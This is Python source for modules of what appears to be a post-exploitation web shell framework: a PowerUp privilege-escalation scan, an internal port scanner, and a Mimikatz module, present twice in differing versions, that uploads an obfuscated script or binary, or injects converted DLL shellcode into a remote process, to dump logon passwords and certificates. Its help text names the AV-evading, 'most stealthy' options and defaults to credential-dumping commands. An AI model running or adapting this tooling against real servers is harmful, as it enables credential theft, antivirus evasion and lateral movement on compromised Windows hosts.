class Privesc_powerup(Module):
_exception_class = PrivescPowerupModuleException
short_help = "Run Powerup module to assess all misconfiguration for privesc"
complete_help = r"""
This module run the Powerup.ps1 script in order to find all possible misconfiguration that can
lead to a privilege escalation.
The output of this module will be just informative, no automatic privesc exploitation will be performed.
Running this module with different users can lead to different results. So it's possible to specify
a user to runas this module.
If no users are provided this module will run under the application pool running user.
Source Code:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
Usage:
#privesc_powerup [username] [password] [domain] [custom_command]
Positional arguments:
username username of the user to runas the process
password password of the user to runas the process
domain domain of the user to runas the process
custom_command the command to run within the module
Default: ';Invoke-AllChecks'
Examples:
Run powerup as the current user
#privesc_powerup
Run powerup as a specific local user
#privesc_powerup 'user1' 'password1'
Run powerup as a specific domain user
#privesc_powerup 'user1' 'password1' 'domain'
Run powerup with a custom command, i.e. save report as html
#privesc_powerup '' '' '' ';Invoke-AllChecks -HTMLReport'
"""
__default_username = ''
__default_password = ''
__default_domain = ''
__default_custom_command = ';Invoke-AllChecks'
def __init__(self, password, channel_enc_mode, module_settings,
request_object):
Module.__init__(self, password, channel_enc_mode, module_settings,
request_object)
self.invoke_ps_module_object = Invoke_ps_module(
password, channel_enc_mode, module_settings, request_object)
self.invoke_ps_as_module_object = Invoke_ps_module_as(
password, channel_enc_mode, module_settings, request_object)
def __parse_run_args(self, args):
args_parser = {k: v for k, v in enumerate(args)}
username = args_parser.get(0, self.__default_username)
password = args_parser.get(1, self.__default_password)
domain = args_parser.get(2, self.__default_domain)
custom_command = args_parser.get(3, self.__default_custom_command)
return username, password, domain, custom_command
def run(self, args):
try:
username, password, domain, custom_command = self.__parse_run_args(
args)
if username == '' and password == '':
response = self.invoke_ps_module_object.run(
['PowerUp.ps1', custom_command])
else:
response = self.invoke_ps_as_module_object.run([
'PowerUp.ps1', username, password, custom_command, domain
])
parsed_response = self._parse_response(response)
except ModuleException as module_exc:
parsed_response = str(module_exc)
except Exception:
parsed_response = '{{{' + self._exception_class.__name__ + '}}}' + '{{{PythonError}}}\n' +\
str(traceback.format_exc())
return parsed_response
class Mimikatz(Module):
_exception_class = MimikatzModuleException
short_help = "Run an offline version of mimikatz directly in memory"
complete_help = r"""
Authors: @gentilkiwi @PowerShellMafia
Links: https://github.com/gentilkiwi/mimikatz
https://github.com/PowerShellMafia/PowerSploit/blob/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1
Credits: @phra
This module allows you to run mimikatz in a versatile way.
Within this module it is possible to run mimikatz in 3 different ways:
'ps1': an obfuscated ps1 module will be uploaded to the server and get deobfuscated at runtime in memory;
'exe': the classic mimikatz binary will be uploaded to the server and run with arguments;
'dll': convert mimikatz dll into a position independent shellcode and inject into a remote process.
It is recommended to run the ps1 version because it will be obfuscated and run from memory.
The exe version will be just dropped as clear and could be catched by av scanners.
The dll version is the most stealthy but it doesn't support impersonation atm.
Usage:
#mimikatz [exec_type] [username] [password] [domain] [custom_command]
Positional arguments:
exec_type execution type for running mimikatz:
'ps1' will upload and execute the powershell version of mimikatz
'exe' will upload and execute the classic version of binary mimikatz
'dll' will inject converted dll shellcode into a remote process
Default: 'ps1'
username username of the user to runas the process
password password of the user to runas the process
domain domain of the user to runas the process
custom_command based on exec_type, the custom command could be:
- 'ps1' : powershell code to add to the ps1 mimikatz module;
- 'exe' : command line arguments to the mimikatz binary;
- 'dll' : command line arguments to be executed.
Default:
'ps1': ';Invoke-Mimikatz -DumpCreds'
'exe': 'privilege::debug sekurlsa::logonpasswords exit'
'dll': 'privilege::debug sekurlsa::logonpasswords exit'
Examples:
Run mimikatz as the current user
#mimikatz
Run mimikatz dll
#mimikatz 'dll'
Run mimikatz as a specific local user
#mimikatz 'ps1' 'user1' 'password1'
Run mimikatz as a specific domain user
#mimikatz 'ps1' 'user1' 'password1' 'domain'
Run exe version of mimikatz as the current user
#mimikatz 'exe'
Run exe version of mimikatz as a specific user
#mimikatz 'exe' 'user1' 'password1'
Run mimikatz with a custom command, i.e. dumping cert
#mimikatz 'ps1' '' '' '' ';Invoke-Mimikatz -DumpCerts'
Run mimikatz binary with a custom command, i.e. coffee :)
#mimikatz 'exe' '' '' '' 'coffee exit'
"""
__default_exec_type = 'ps1'
__default_username = ''
__default_password = ''
__default_domain = ''
__default_ps_command = ';Invoke-Mimikatz -DumpCreds'
__default_exe_command = 'privilege::debug sekurlsa::logonpasswords exit'
def __init__(self, password, channel_enc_mode, module_settings,
request_object):
Module.__init__(self, password, channel_enc_mode, module_settings,
request_object)
self.upload_module_object = Upload(password, channel_enc_mode,
module_settings, request_object)
self.exec_cmd_module_object = Exec_cmd(password, channel_enc_mode,
module_settings, request_object)
self.runas_module_object = Runas(password, channel_enc_mode,
module_settings, request_object)
self.invoke_ps_module_object = Invoke_ps_module(
password, channel_enc_mode, module_settings, request_object)
self.invoke_ps_as_module_object = Invoke_ps_module_as(
password, channel_enc_mode, module_settings, request_object)
self.inject_dll_srdi_module_object = Inject_dll_srdi(
password, channel_enc_mode, module_settings, request_object)
def __parse_run_args(self, args):
args_parser = {k: v for k, v in enumerate(args)}
exec_type = args_parser.get(0, self.__default_exec_type)
username = args_parser.get(1, self.__default_username)
password = args_parser.get(2, self.__default_password)
domain = args_parser.get(3, self.__default_domain)
custom_command = args_parser.get(
4, self.__default_exe_command
if exec_type != 'ps1' else self.__default_ps_command)
return exec_type, username, password, domain, custom_command
def __lookup_exe_binary(self):
if 'mimikatz.exe' in self._module_settings.keys():
bin_path = self._module_settings['mimikatz.exe']
else:
exe_path = config.modules_paths + 'exe_modules/mimikatz.exe'
remote_upload_path = self._module_settings[
'env_directory'] + '\\' + random_generator() + '.exe'
print '\n\n\nUploading mimikatz binary....\n'
upload_response = self._parse_response(
self.upload_module_object.run([exe_path, remote_upload_path]))
print upload_response
self._module_settings['mimikatz.exe'] = remote_upload_path
bin_path = remote_upload_path
return bin_path
def __run_exe_version(self, username, password, domain, custom_command):
remote_upload_path = self.__lookup_exe_binary()
if username == '':
response = self.exec_cmd_module_object.run(
['""' + remote_upload_path + '""' + ' ' + custom_command])
else:
response = self.runas_module_object.run([
remote_upload_path + ' ' + custom_command, username, password,
domain
])
parsed_response = self._parse_response(response)
return parsed_response
def __run_dll_version(self, username, custom_command):
dll_name = 'powerkatz.dll'
exported_function_name = 'powershell_reflective_mimikatz'
log_file = self._module_settings[
'env_directory'] + '\\' + random_generator()
exported_function_data = str(
('"log ' + log_file + '" ' + custom_command +
'\x00').encode('utf-16-le'))
if username == '':
print '\n\nInjecting converted DLL shellcode into remote process...'
response = self.inject_dll_srdi_module_object.run([
dll_name, 'remote_virtual', 'cmd.exe', '60000', '{}',
exported_function_name, exported_function_data
])
response = self._parse_response(response)
response += '\nDLL injection executed!\n\n\nOutput of mimikatz:\n\n'
response += self._parse_response(
self.exec_cmd_module_object.run(
['type ' + log_file + ' & del /f /q ' + log_file]))
else:
raise self._exception_class(
'#mimikatz: exec_type "dll" does not support the runas function atm\n'
)
parsed_response = self._parse_response(response)
return parsed_response
def __run_ps_version(self, username, password, domain, custom_command):
if username == '':
response = self.invoke_ps_module_object.run(
['Invoke-Mimikatz.ps1', custom_command])
else:
response = self.invoke_ps_as_module_object.run([
'Invoke-Mimikatz.ps1', username, password, custom_command,
domain
])
parsed_response = self._parse_response(response)
return parsed_response
def run(self, args):
try:
exec_type, username, password, domain, custom_command = self.__parse_run_args(
args)
if exec_type == 'exe':
response = self.__run_exe_version(username, password, domain,
custom_command)
elif exec_type == 'dll':
response = self.__run_dll_version(username, custom_command)
else:
response = self.__run_ps_version(username, password, domain,
custom_command)
parsed_response = self._parse_response(response)
except ModuleException as module_exc:
parsed_response = str(module_exc)
except Exception:
parsed_response = '{{{' + self._exception_class.__name__ + '}}}' + '{{{PythonError}}}\n' +\
str(traceback.format_exc())
return parsed_response
class Net_portscan(Module):
_exception_class = NetPortscanModuleException
short_help = "Run a port scan using regular sockets, based (pretty) loosely on nmap"
complete_help = r"""
This module run the Invoke-Portscan.ps1 script in order to perform a portscan on a host or network.
Source Code:
https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/Invoke-Portscan.ps1
Usage:
#net_portscan hosts [ports] [custom_arguments]
Positional arguments:
hosts ip or hostnames to scan
ranges can be used with "-" separator or CIDR notation
ports ports to be scanned
different ports can be specified using ',' separator
ranges can be used with "-" separator
Default: 'Top25'
custom_arguments custom arguments for ps1 module
Default: ' -T 3 '
Examples:
Run default portscan on a subnet
#net_portscan 192.168.1.0/24
Run portscan on specific ports
#net_portscan 192.168.1.0/24 '445'
Run portscan on specific ports and with aggressive mode
#net_portscan 192.168.1.0/24 '445' ' -T 5 '
"""
__default_ports = 'default'
__default_custom_arguments = ' -T 3 '
__appended_code_ps_module = ';Invoke-Portscan -Hosts "%s" %s %s -oN %s'
def __init__(self, password, channel_enc_mode, module_settings,
request_object):
Module.__init__(self, password, channel_enc_mode, module_settings,
request_object)
self.invoke_ps_module_object = Invoke_ps_module(
password, channel_enc_mode, module_settings, request_object)
self.exec_cmd_module_object = Exec_cmd(password, channel_enc_mode,
module_settings, request_object)
def __parse_run_args(self, args):
if len(args) < 1:
raise self._exception_class(
'#net_portscan: Not enough arguments. 1 Argument required.\n')
args_parser = {k: v for k, v in enumerate(args)}
hosts = args_parser.get(0)
ports = args_parser.get(1, self.__default_ports)
custom_arguments = args_parser.get(2, self.__default_custom_arguments)
return hosts, ports, custom_arguments
def __gen_appended_code(self, hosts, ports, custom_arguments, output_file):
ports = '-TopPorts 25' if ports == 'default' else '-Ports "' + ports + '"'
appended_code = self.__appended_code_ps_module % (
hosts, ports, custom_arguments, output_file)
return appended_code
def run(self, args):
try:
hosts, ports, custom_arguments = self.__parse_run_args(args)
output_file = self._module_settings[
'env_directory'] + '\\' + random_generator()
appended_code = self.__gen_appended_code(hosts, ports,
custom_arguments,
output_file)
self._parse_response(
self.invoke_ps_module_object.run(
['Invoke-Portscan.ps1', appended_code]))
response = self.exec_cmd_module_object.run(
['type ' + output_file + ' & del /f /q ' + output_file])
parsed_response = self._parse_response(response)
except ModuleException as module_exc:
parsed_response = str(module_exc)
except Exception:
parsed_response = '{{{' + self._exception_class.__name__ + '}}}' + '{{{PythonError}}}\n' +\
str(traceback.format_exc())
return parsed_response
class Mimikatz(Module):
_exception_class = MimikatzModuleException
short_help = "Run an offline version of mimikatz directly in memory"
complete_help = r"""
This module allows you to run mimikatz in a versatile way.
Within this module it is possible to run mimikatz in 2 different way:
'ps1': an obfuscated ps1 module will be uploaded to the server and get deobfuscated at runtime in memory;
'exe': the classic mimikatz binary will be uploaded to the server and run with arguments.
It is recommended to run the ps1 version because it will be obfuscated and run from memory.
The exe version will be just dropped as clear and could be catched by av scanners.
Exec_Type can be 'ps1' or 'exe'.
Source Code:
https://github.com/gentilkiwi/mimikatz
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
Usage:
#mimikatz [exec_type] [username] [password] [domain] [custom_command]
Positional arguments:
exec_type type of running mimikatz.
'ps1' will upload and execute the powershell version of mimikatz
'exe' will upload and execute the classic version of binary mimikatz
Default: 'ps1'
username username of the user to runas the process
password password of the user to runas the process
domain domain of the user to runas the process
custom_command based on exec_type, the custom command could be:
- 'ps1' : powershell code to add to the ps1 mimikatz module;
- 'exe' : command line arguments to the mimikatz binary;
Default:
'ps1': ';Invoke-Mimikatz -DumpCreds'
'exe': 'privilege::debug sekurlsa::logonpasswords exit'
Examples:
Run mimikatz as the current user
#mimikatz
Run mimikatz as a specific local user
#mimikatz 'ps1' 'user1' 'password1'
Run mimikatz as a specific domain user
#mimikatz 'ps1' 'user1' 'password1' 'domain'
Run exe version of mimikatz as the current user
#mimikatz 'exe'
Run exe version of mimikatz as a specific user
#mimikatz 'exe' 'user1' 'password1'
Run mimikatz with a custom command, i.e. dumping cert
#mimikatz 'ps1' '' '' '' ';Invoke-Mimikatz -DumpCerts'
Run mimikatz binary with a custom command, i.e. coffee :)
#mimikatz 'exe' '' '' '' 'coffee exit'
"""
__default_exec_type = 'ps1'
__default_username = ''
__default_password = ''
__default_domain = ''
__default_ps_command = ';Invoke-Mimikatz -DumpCreds'
__default_exe_command = 'privilege::debug sekurlsa::logonpasswords exit'
def __init__(self, password, channel_enc_mode, module_settings,
request_object):
Module.__init__(self, password, channel_enc_mode, module_settings,
request_object)
self.upload_module_object = Upload(password, channel_enc_mode,
module_settings, request_object)
self.exec_cmd_module_object = Exec_cmd(password, channel_enc_mode,
module_settings, request_object)
self.runas_module_object = Runas(password, channel_enc_mode,
module_settings, request_object)
self.invoke_ps_module_object = Invoke_ps_module(
password, channel_enc_mode, module_settings, request_object)
self.invoke_ps_as_module_object = Invoke_ps_module_as(
password, channel_enc_mode, module_settings, request_object)
def __parse_run_args(self, args):
args_parser = {k: v for k, v in enumerate(args)}
exec_type = args_parser.get(0, self.__default_exec_type)
username = args_parser.get(1, self.__default_username)
password = args_parser.get(2, self.__default_password)
domain = args_parser.get(3, self.__default_domain)
custom_command = args_parser.get(
4, self.__default_exe_command
if exec_type == 'exe' else self.__default_ps_command)
return exec_type, username, password, domain, custom_command
def __lookup_exe_binary(self):
if 'mimikatz.exe' in self._module_settings.keys():
bin_path = self._module_settings['mimikatz.exe']
else:
exe_path = config.modules_paths + 'exe_modules/mimikatz.exe'
remote_upload_path = self._module_settings[
'env_directory'] + '\\' + random_generator() + '.exe'
print '\n\n\nUploading mimikatz binary....\n'
upload_response = self._parse_response(
self.upload_module_object.run([exe_path, remote_upload_path]))
print upload_response
self._module_settings['mimikatz.exe'] = remote_upload_path
bin_path = remote_upload_path
return bin_path
def __run_exe_version(self, username, password, domain, custom_command):
try:
remote_upload_path = self.__lookup_exe_binary()
if username == '':
response = self.exec_cmd_module_object.run(
['""' + remote_upload_path + '""' + ' ' + custom_command])
else:
response = self.runas_module_object.run([
remote_upload_path + ' ' + custom_command, username,
password, domain
])
parsed_response = self._parse_response(response)
except ModuleException as module_exc:
parsed_response = str(module_exc)
return parsed_response
def __run_ps_version(self, username, password, domain, custom_command):
if username == '':
response = self.invoke_ps_module_object.run(
['Invoke-Mimikatz.ps1', custom_command])
else:
response = self.invoke_ps_as_module_object.run([
'Invoke-Mimikatz.ps1', username, password, custom_command,
domain
])
parsed_response = self._parse_response(response)
return parsed_response
def run(self, args):
try:
exec_type, username, password, domain, custom_command = self.__parse_run_args(
args)
if exec_type == 'exe':
response = self.__run_exe_version(username, password, domain,
custom_command)
else:
response = self.__run_ps_version(username, password, domain,
custom_command)
parsed_response = self._parse_response(response)
except ModuleException as module_exc:
parsed_response = str(module_exc)
except Exception:
parsed_response = '{{{' + self._exception_class.__name__ + '}}}' + '{{{PythonError}}}\n' +\
str(traceback.format_exc())
return parsed_response